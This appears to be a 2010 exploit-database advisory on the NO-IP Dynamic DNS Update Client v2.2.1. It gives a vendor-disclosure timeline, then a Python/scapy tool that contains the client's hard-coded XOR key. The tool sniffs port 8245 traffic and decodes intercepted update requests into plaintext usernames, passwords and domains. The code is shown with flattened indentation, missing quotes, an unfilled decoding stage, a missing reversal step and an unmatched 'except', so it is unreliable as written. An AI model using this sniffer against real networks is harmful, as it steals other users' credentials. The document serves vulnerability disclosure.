| __ __|
| _________________/ /___ _____ / /________ _____ ___|
|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|
| http://www.corelan.be:8800 |
|security@corelan.be |
|-------------------------------------------------[ EIP Hunters ]--|
NO-IP.com Dynamic DNS Update Client (DUC) v2.2.1 Request Decoder
by: sinn3r
Software Tested on: Windows XP SP3 ENG (victim) + BT4 Final (attacker)
Greetz: Corelan Security Team & Offensive Security Exploit Database Team
Special thanks to: Kurt from no-ip.com
DUC is a dynamic DNS update client that continually checks for IP changes in the
background and automataically updates the DNS at NO-IP via HTTP. The username,
password, and domain name can be decoded thus making the user more vulnerable to
MITM attacks.We encourage v2 users to upgrade to v3 for this particular reason:
03/10/2010 - Vendor Contacted.
03/19/2010 - Contacting the vendor again.
03/20/2010 - Initial response from vendor
03/25/2010 - Requesting for a patch update
03/26/2010 - Vendor replies, no update yet.
03/31/2010 - Requesting for a patch date again.
04/01/2010 - Vendor tells us they plan to release v3 on 4/15/2010.
04/17/2010 - v3 final delayed. Requesting for another update.
04/19/2010 - Vendor sets v3 release date to 4/27/2010.Proof of concept delivered.
04/27/2010 - v3 final delayed.
05/12/2010 - Requesting for another update.
05/18/2010 - Vendor sets v3 release date to 6/02/2010.
06/02/2010 - v3 final delayed.
06/12/2010 - Requesting final deadline.
06/22/2010 - Vendor releases v3
import base64
import re
from scapy.all import *
def decode(enc_request):
The custom encoder consists of 3 stages:
1. Rearrange the request string in reverse (find the code at 0x00470259)
2. XOR the reversed string with a private key (find the code at 0x0046F868)
3. Base64 the XOR'd string (find the code at 0x004706D0)
private_key = "9ICybvm/nqBpiSo0x8KNVBlZ1Ad96+8fPRHtX4+zBBuV00c"
private_key_length = len(private_key)
## 1st Stage: Base64 Decoder
stage1 = base64.decodestring(enc_request)
## 2nd Stage: The custom XOR algorithm
stage2 = []
counter = 0
for byte in stage1:
hex_byte= byte.encode("hex") #XOR key
hex_value = private_key[counter].encode("hex") #Value
int_byte= int(hex_byte, 16) #Convert hex to int for XOR
int_value = int(hex_value, 16) #Convert hex to int for XOR
xor = int_value ^ int_byte
xor_char = chr(xor)
if counter >= private_key_length-1:
counter = 0
counter += 1
## 3rd stage: Reverse order
stage3 = "".join(stage2)
return stage3 #Secret
def callback(pkt):
The callback function for the scapy sniffer
filter="tcp and port 8245"
raw = pkt.sprintf("%Raw.load%")
m = re.search("\?request=[a-zA-Z0-9=]+ ", raw)
if m != None:
encoded_request = m.group(0)
encoded_request = encoded_request.replace("?request=", "")
tmp = decode(encoded_request.strip())
secret = format(tmp)
print "[*] I smell password!"
print "%s\n" %secret
def format(data):
Modify the display format for your viewing pleasure
data = data.replace("&", "\n")
data = data.replace("pass=", "password=")
data = data.replace("h[]=", "domain=")
return data
if __name__ == "__main__":
print "|---------------------------------------------------------------|"
print "|NO-IP.com Domain Update Client (DUC) v2.2.1 Request Decoder|"
print "|Coded by sinn3r twitter.com/_sinn3r|"
print "|---------------------------------------------------------------|\r\n"
print "Mode 1: Basic(Use wireshark to sniff the string on port 8245 first)"
print "Mode 2: Sniffer(Forward the traffic to this machine first.)\n"
mode = raw_input("Select mode [1]: ")
## Basic Mode
if mode == "1":
#Listen on port 8245 with Wireshark to grab the REQUEST string
encoded_request = raw_input("Encoded string: ")
if encoded_request != "":
tmp = decode(encoded_request)
secret = format(tmp)
print secret
## Sniffer Mode
elif mode == "2":
print "[*] Sniffing for NO-IP traffic on port 8245..."
print "[*] Press [CTRL] + [C] to stop sniffing.\n"
sniffer = sniff(filter="tcp and port 8245", prn=callback)
print "[*] Que?"
except KeyboardInterrupt:
print "\r\n[*] Good bye"